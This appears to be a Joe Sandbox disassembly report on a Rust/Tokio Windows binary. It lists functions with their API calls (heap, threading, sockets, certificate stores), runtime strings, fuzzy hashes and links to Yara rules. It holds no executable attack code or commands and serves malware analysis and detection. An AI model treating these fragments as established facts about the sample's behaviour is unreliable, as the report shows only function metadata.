Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: cde8dbbb45cc02350e5aafd0c0be33303d63336c885303feb7c7bec7d3a7b47a
Instruction ID: c74784d285ce8a489e934a884905052ff46e89b946e591c1c3321bd20aae333e
Opcode Fuzzy Hash: cde8dbbb45cc02350e5aafd0c0be33303d63336c885303feb7c7bec7d3a7b47a
Instruction Fuzzy Hash: C4229F22A08BC695EB619F39D8403F873A0FB55B9DF045235DF9DAA796DF39A184C300

Function 00007FF6B1A056C0 Relevance: 6.2, APIs: 4, Instructions: 182
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

BCryptGenRandom.BCRYPT ref: 00007FF6B1A056F7
SystemFunction036.ADVAPI32 ref: 00007FF6B1A05712
HeapFree.KERNEL32 ref: 00007FF6B1A058EE
HeapFree.KERNEL32 ref: 00007FF6B1A059F6

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$CryptFunction036RandomSystem
String ID:
API String ID: 464044557-0
Opcode ID: 05e4f949927ec6dc63ad549dd82e93c1458fc3965770b0dd27aa9764737138df
Instruction ID: 70b9e08f5f1369013ace944db10f0ef11bd24989b36812836e2a6564e096d8f8
Opcode Fuzzy Hash: 05e4f949927ec6dc63ad549dd82e93c1458fc3965770b0dd27aa9764737138df
Instruction Fuzzy Hash: 97A14D21918AC1A9F7168B28E4493F867B0FF9575CF049232EF8D537A5EF39A2D58340

Function 00007FF6B19E1DC0 Relevance: 5.4, Strings: 4, Instructions: 409COMMON

Download Yara Rule

Strings

cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs, xrefs: 00007FF6B19E222A
A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi, xrefs: 00007FF6B19E241C, 00007FF6B19E2434
assertion failed: !handle.is_shutdown(), xrefs: 00007FF6B19E23D2
A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, this is a bug!, xrefs: 00007FF6B19E23BA, 00007FF6B19E23EA, 00007FF6B19E2402

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi$A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, this is a bug!$assertion failed: !handle.is_shutdown()$cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs
API String ID: 0-4050240044
Opcode ID: 912757454d4a9eb0f2ed456fcd83b31914e912f618db247ac56e0773978d9b64
Instruction ID: 28c6fcdcb5893ccd63a6684312173768ef39b57e8204c475a5d882925dc7f112
Opcode Fuzzy Hash: 912757454d4a9eb0f2ed456fcd83b31914e912f618db247ac56e0773978d9b64
Instruction Fuzzy Hash: 3A02C462B18682A6FB149B6DE8447B927A0BB5879CF008532DF5E937D6CF3CE645C300

Function 00007FF6B1958E60 Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 430COMMON

Download Yara Rule

Strings

assertion failed: buf.len() <= u32::MAX as usize/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\sys\pal\windows\io.rs, xrefs: 00007FF6B1959952
Out of bounds access, xrefs: 00007FF6B1959979

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID:
String ID: Out of bounds access$assertion failed: buf.len() <= u32::MAX as usize/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\sys\pal\windows\io.rs
API String ID: 0-2214027134
Opcode ID: 77073634a8427156a48ec921215a7cfbd98b2c44a417f09eca69a34be2fb05db
Instruction ID: 6a094e705fd0243e7a55cce3cf7786132d40241981b8db7e8f3e8f5201bdf732
Opcode Fuzzy Hash: 77073634a8427156a48ec921215a7cfbd98b2c44a417f09eca69a34be2fb05db
Instruction Fuzzy Hash: EB029C62B08BC6A5FB609F29A4443AA67A1FB48BCCF544136DB8D97B59DF3CE544C300

Function 00007FF6B19A82F0 Relevance: 4.6, APIs: 3, Instructions: 63filenativesynchronizationCOMMON

Download Yara Rule

APIs

NtWriteFile.NTDLL ref: 00007FF6B19A833C
WaitForSingleObject.KERNEL32 ref: 00007FF6B19A8351
RtlNtStatusToDosError.NTDLL ref: 00007FF6B19A836F

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: ErrorFileObjectSingleStatusWaitWrite
String ID:
API String ID: 3447438843-0
Opcode ID: f4895b95589fd000aae295bfb341e75c447760fed3a864ef7b12b8d3d939dc58
Instruction ID: 4a1087f86466d25da84bd1f1f8cd2acc0a8decab588d39338b25a0bda4db6da6
Opcode Fuzzy Hash: f4895b95589fd000aae295bfb341e75c447760fed3a864ef7b12b8d3d939dc58
Instruction Fuzzy Hash: 52218662F14A8199F710DB78E8403AD37A1EB5435CF548231EB5D93A95EF3CE1D58740

Function 00007FF6B1926D01 Relevance: 2.1, APIs: 1, Instructions: 861memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6B1928630

Part of subcall function 00007FF6B19BFA30: GetProcessHeap.KERNEL32 ref: 00007FF6B1A08561

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: b2e0a90c8282dbef23c6f4bc4f0100744deb4569557f0a2a15d50f2a7c748d31
Instruction ID: d5f1c7497c8c1c0ecd8dd67ccbffd55ca6d83e72c583d2c7a94645eea3fff23f
Opcode Fuzzy Hash: b2e0a90c8282dbef23c6f4bc4f0100744deb4569557f0a2a15d50f2a7c748d31
Instruction Fuzzy Hash: 5BC23872908BC195E3429F38D4457E937A0FB99B4CF089236DF885B35AEF799285C360

Function 00007FF6B19AEE90 Relevance: 13.7, APIs: 9, Instructions: 177
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B19AD680: HeapFree.KERNEL32(?,?,?,?,?,00000001,00007FF6B18BAA09,?,00000000,?,00007FF6B19AD072), ref: 00007FF6B19AD7C8

HeapFree.KERNEL32 ref: 00007FF6B19AF065
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,0000000E,?,0000000E,?,?), ref: 00007FF6B19AF091
GetLastError.KERNEL32 ref: 00007FF6B19AF0AF
GetLastError.KERNEL32 ref: 00007FF6B19AF0CB
CloseHandle.KERNEL32 ref: 00007FF6B19AF0DF
HeapFree.KERNEL32 ref: 00007FF6B19AF0F6

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$ErrorLast$CloseHandle
String ID:
API String ID: 4241441966-0
Opcode ID: c120d5e3d287e27b8b981697f94a34a171e820db0d9de68ee845a6acc82db1ba
Instruction ID: 3a9b1f619d12bfc098e73292964426bbf722aaad1191a730e9484a322ffe1208
Opcode Fuzzy Hash: c120d5e3d287e27b8b981697f94a34a171e820db0d9de68ee845a6acc82db1ba
Instruction Fuzzy Hash: 5671DE61E28AE366FB61A72A96443BD27A1AB4479CF044531CF4D83AC6DF3CF4998300

Function 00007FF6B1951ADA Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32 ref: 00007FF6B1952172

Strings

tcp connect error, xrefs: 00007FF6B1952355

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: closesocket
String ID: tcp connect error
API String ID: 2781271927-3983906501
Opcode ID: 55bceb16613b51e3371e9d53d164941652cb0f82e3dfb209557165458557f82b
Instruction ID: 65bb07f374e73f1d84af4317f8cef1da9ba968ee1866fdb1ad7c381bf59478d5
Opcode Fuzzy Hash: 55bceb16613b51e3371e9d53d164941652cb0f82e3dfb209557165458557f82b
Instruction Fuzzy Hash: E4223636908BCAD8E7759F29D9457E92364FB5878CF045222DF8C5BB5ADF34A684C300

Function 00007FF6B1912D20 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetQueuedCompletionStatusEx.KERNEL32 ref: 00007FF6B1912E24

Strings

assertion failed: !self.is_polling.swap(true, Ordering::AcqRel), xrefs: 00007FF6B191324B
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6B19131E2, 00007FF6B191322D

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: CompletionQueuedStatus
String ID: assertion failed: !self.is_polling.swap(true, Ordering::AcqRel)$called `Result::unwrap()` on an `Err` value
API String ID: 2001429441-1708566100
Opcode ID: 5179d36f8f459f34c2070f4130f4f5a26cbaf846bdb6442ad5eabd472d154dbc
Instruction ID: be011abd10e03fd1a327482584ecfe353c04a93a675cb42146da901abb220c5f
Opcode Fuzzy Hash: 5179d36f8f459f34c2070f4130f4f5a26cbaf846bdb6442ad5eabd472d154dbc
Instruction Fuzzy Hash: 96E1AF22A086E2B6EB60EB6994047BA27B4BB4479CF544436DF5D87782CF3CE695C340

Function 00007FF6B1906480 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 271
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getpeername.WS2_32 ref: 00007FF6B1906533
WSAGetLastError.WS2_32 ref: 00007FF6B1906585
getsockname.WS2_32 ref: 00007FF6B190662F
WSAGetLastError.WS2_32 ref: 00007FF6B190666E

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF6B190683F, 00007FF6B1906873
assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF6B1906825, 00007FF6B1906859

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: ErrorLast$getpeernamegetsockname
String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 1444953621-3544120690
Opcode ID: 6bca9f2356c957eee9b327f4e83b7c7273aa3033f5358c7b27a0badcc1a52929
Instruction ID: 0f7d3ff73fc7ce66288a406ffa1dd98babd64f299169661fa30197cf3148f4c6
Opcode Fuzzy Hash: 6bca9f2356c957eee9b327f4e83b7c7273aa3033f5358c7b27a0badcc1a52929
Instruction Fuzzy Hash: 59D19E62D086D2A9F7219F68A8053EC33B0FF4435CF144125EF5D53A96EF39A692C340

Function 00007FF6B18BA4B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AddVectoredExceptionHandler.KERNEL32 ref: 00007FF6B18BA4D2
SetThreadStackGuarantee.KERNELBASE ref: 00007FF6B18BA4E3
GetCurrentThread.KERNEL32 ref: 00007FF6B18BA4E9
SetThreadDescription.KERNELBASE ref: 00007FF6B18BA500
HeapFree.KERNEL32 ref: 00007FF6B18BA781

Strings

main, xrefs: 00007FF6B18BA4F6

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Thread$CurrentDescriptionExceptionFreeGuaranteeHandlerHeapStackVectored
String ID: main
API String ID: 2624659117-3207122276
Opcode ID: b3ec90835067258c872a52c9ae1b3c6a1ae37e2a45f8a4fca836608845d39b86
Instruction ID: 59c357aed93f8688323302fae6285a2f42d3334c3cf97c2763ffdc4e5a6303f3
Opcode Fuzzy Hash: b3ec90835067258c872a52c9ae1b3c6a1ae37e2a45f8a4fca836608845d39b86
Instruction Fuzzy Hash: B4813D36A14B86A9EB50CF29D8843A937B0FB8875CF508136DA5D837A4DF3DE589C340

Function 00007FF6B19210B0 Relevance: 7.6, APIs: 5, Instructions: 77
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32 ref: 00007FF6B1921110
RtlFreeHeap.NTDLL ref: 00007FF6B1921166
HeapFree.KERNEL32 ref: 00007FF6B1921178
RtlFreeHeap.NTDLL ref: 00007FF6B1921192
HeapFree.KERNEL32 ref: 00007FF6B19211C0

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6905ecc1736fc0ffe7eca53620898f370fbe43cb2911cc3082627820d226a998
Instruction ID: 5f98c9f6a6b3c5f559d9dec800ccf9bb1a4f3f35cd27f5cc107259bdddde2baa
Opcode Fuzzy Hash: 6905ecc1736fc0ffe7eca53620898f370fbe43cb2911cc3082627820d226a998
Instruction Fuzzy Hash: F6315C66B04B82E6F7049B6AD8843B823B1FB89B98F544536CF1D977A5CF39E491C340

Function 00007FF6B19A0E90 Relevance: 6.2, APIs: 4, Instructions: 241
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertFreeCertificateContext.CRYPT32 ref: 00007FF6B19A0EE9
CertCloseStore.CRYPT32 ref: 00007FF6B19A0EF5

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: Cert$CertificateCloseContextFreeStore
String ID:
API String ID: 2231022040-0
Opcode ID: ada4fb51486db212eea2ceb97ed2ae5a55d82e0322d9ca6e45da760f701638aa
Instruction ID: 6aebbaecc2bba550876314b7bbc16eda44fb246e3aed248e2c3e3d844bc154b3
Opcode Fuzzy Hash: ada4fb51486db212eea2ceb97ed2ae5a55d82e0322d9ca6e45da760f701638aa
Instruction Fuzzy Hash: E4B17B67A14A86E5EB119B6AD8402AD3771FB84BACF444232CF6D977E5CF38D499C300

Function 00007FF6B19BCA50 Relevance: 6.1, APIs: 4, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF6B19BCAB8
HeapFree.KERNEL32 ref: 00007FF6B19BCB0E
HeapFree.KERNEL32 ref: 00007FF6B19BCB20
GetLastError.KERNEL32 ref: 00007FF6B19BCB26

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$CreateErrorLastThread
String ID:
API String ID: 1443094557-0
Opcode ID: 6fab1610b089e29dea73b102fdaed4b18a14de67503876e9b02dffbcdf9c6518
Instruction ID: b56b9d3125111804abd314db7e1c2b0f65da20ce21f949e8a873331edcc3c8fa
Opcode Fuzzy Hash: 6fab1610b089e29dea73b102fdaed4b18a14de67503876e9b02dffbcdf9c6518
Instruction Fuzzy Hash: 0A318272B04B8195FB009B6AE8443AD67A5BB88BACF048536DF5C93798DF3CD482C310

Function 00007FF6B1A07B30 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B1A07BCF
GetLastError.KERNEL32 ref: 00007FF6B1A07BD7

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: AddressErrorLastWait
String ID:
API String ID: 1574541344-0
Opcode ID: 9470d744ce46ffb6eb2448151e51da26ca2e7b223349cf1a089635a55d979e6a
Instruction ID: c3983b727e76d1fe99e97b1f8cb36f35020f75955d58b52f777dc6017e90eb6c
Opcode Fuzzy Hash: 9470d744ce46ffb6eb2448151e51da26ca2e7b223349cf1a089635a55d979e6a
Instruction Fuzzy Hash: 2F31B836F05A12A9F721CBA998485A92761AB4576CF148132DF5EC7BC4DF3CF442C340

Function 00007FF6B19734D0 Relevance: 5.1, APIs: 4, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6B1940856,?,?,?,?,?,00007FF6B18D3A2A), ref: 00007FF6B197356F
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6B1940856,?,?,?,?,?,00007FF6B18D3A2A), ref: 00007FF6B1973593
HeapFree.KERNEL32 ref: 00007FF6B19735B3
HeapFree.KERNEL32 ref: 00007FF6B1973621

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c6c68972cb0fd389e4ceb108d1a2b9f25969b51eae06aa472cb43cc7ac52a228
Instruction ID: 1e102d6a3fb7d90ebb532b1aa3dd6a4eaa84c19d9d39aacaeec4c2cca3bb09dd
Opcode Fuzzy Hash: c6c68972cb0fd389e4ceb108d1a2b9f25969b51eae06aa472cb43cc7ac52a228
Instruction Fuzzy Hash: 2351E776B04A8694EB059B6AD8402FD23B1FB88BACF444637CF1D97795DF38E2958340

Function 00007FF6B19E1150 Relevance: 4.8, APIs: 3, Instructions: 280memoryCOMMON

Download Yara Rule

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6B19E12EE
HeapFree.KERNEL32 ref: 00007FF6B19E13F2
HeapFree.KERNEL32 ref: 00007FF6B19E1405

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$AddressSingleWake
String ID:
API String ID: 2995119335-0
Opcode ID: da73fdff05f7fb665e48ab61776b887a20822d1b0a5e4016dbff11f7506dfa02
Instruction ID: bc501a0e2b6f43564167592eeaa77fed60b4b72f70a4239658e56d989332bf0a
Opcode Fuzzy Hash: da73fdff05f7fb665e48ab61776b887a20822d1b0a5e4016dbff11f7506dfa02
Instruction Fuzzy Hash: FFC19C62A15B82E5EB60DB69D8403AD37A0FB48B9CF548536DF4D87795DF38E2858300

Function 00007FF6B19BA5A0 Relevance: 4.6, APIs: 3, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B19AD680: HeapFree.KERNEL32(?,?,?,?,?,00000001,00007FF6B18BAA09,?,00000000,?,00007FF6B19AD072), ref: 00007FF6B19AD7C8

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000200,?), ref: 00007FF6B19BA671
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000200,?), ref: 00007FF6B19BA684
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000200,?), ref: 00007FF6B19BA6AC

Memory Dump Source

Source File: 00000000.00000002.1740459747.00007FF6B18B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B18B0000, based on PE: true

Associated: 00000000.00000002.1740447496.00007FF6B18B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740538460.00007FF6B1A0B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740710954.00007FF6B1A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1740725782.00007FF6B1A8B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b18b0000_xoJxSAotVM.jbxd

Similarity

API ID: FreeHeap$AttributesFile
